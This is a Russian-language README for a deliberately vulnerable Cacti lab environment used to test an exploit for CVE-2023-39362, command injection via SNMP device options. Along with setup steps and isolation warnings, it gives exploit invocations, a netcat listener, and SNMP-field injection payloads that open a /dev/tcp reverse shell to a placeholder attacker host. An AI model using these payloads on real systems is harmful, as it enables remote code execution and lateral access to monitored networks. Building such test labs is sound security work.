
Этот репозиторий является форком этого репозитория: https://github.com/m3ssap0/cacti-rce-snmp-options-vulnerable-application
Cacti — это фреймворк с открытым исходным кодом для операционного мониторинга и управления сбоями, который постоянно развивается, чтобы удовлетворять динамические потребности своего сообщества пользователей.
В версии 1.2.24 была выявлена потенциальная уязвимость безопасности, обозначенная как CVE-2023-39362. При определенных условиях аутентифицированный привилегированный пользователь может использовать недостаток в SNMP-опциях Устройства, применяя вредоносную строку, которая приводит к внедрению команд. В результате этой эксплуатации выполняется аутентифицированный удаленный код на базовом сервере.
CVE: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-39362
Последствия этой уязвимости серьезны, поскольку злоумышленник с аутентифицированными привилегиями может поставить под угрозу целостность сервера, на котором размещается Cacti. Эта компрометация потенциально может служить шлюзом для несанкционированного доступа к другим хостам в сети, особенно к тем, за которыми следит Cacti.
Это уязвимое приложение для тестирования эксплойта для уязвимости Cacti (CVE-2023-39362).
Это приложение содержит серьезные уязвимости безопасности. Запускайте его на свой страх и риск! Рекомендуется использовать резервную и изолированную среду (например, виртуальную машину со свежим снимком и сетью только для хоста). Не размещайте это приложение на серверах с доступом в Интернет, так как они будут скомпрометированы.
Я не несу ответственности за то, как кто-либо использует это приложение. Единственное назначение этого приложения — быть тестовым сценарием для эксплойта CVE-2023-39362, и его не следует использовать в злонамеренных целях. Если ваш сервер будет скомпрометирован через установку этого приложения, это не моя ответственность, а ответственность лиц, которые загрузили и установили его.**
Здесь приведены шаги для настройки окружения:
docker compose up -d, чтобы запустить композицию.admin/admin.admin.guest.guest, чтобы попробовать эксплойт.Официальное руководство по установке Cacti можно найти здесь.
Для остановки окружения используйте команду docker compose down.
(Это лишь один из возможных путей эксплуатации)
Выполните команду на удаленном сервере:
python3 exploit.py --url http://localhost -u guest -p Sup3rS3cr3tPassword.1234 --cmd touch /tmp/proof
Открытие обратной оболочки:
nc -lvnp 4242
python3 exploit.py --url http://localhost -u guest -p Sup3rS3cr3tPassword.1234 --cmd 'bash -c "exec bash -i &>/dev/tcp/ATTACKER_IP/PORT <&1"'
public\' ; touch /tmp/proof ; \'./tmp.Чтобы получить обратную оболочку, можно использовать следующую полезную нагрузку.
public\' ; bash -c "exec bash -i &>/dev/tcp/<host>/<port> <&1" ; \'
Подробное описание корневой причины уязвимости доступно в оригинальном бюллетене безопасности или в блоге оригинального автора.
Этот проект лицензирован в соответствии с Unlicense — подробности см. в файле LICENSE.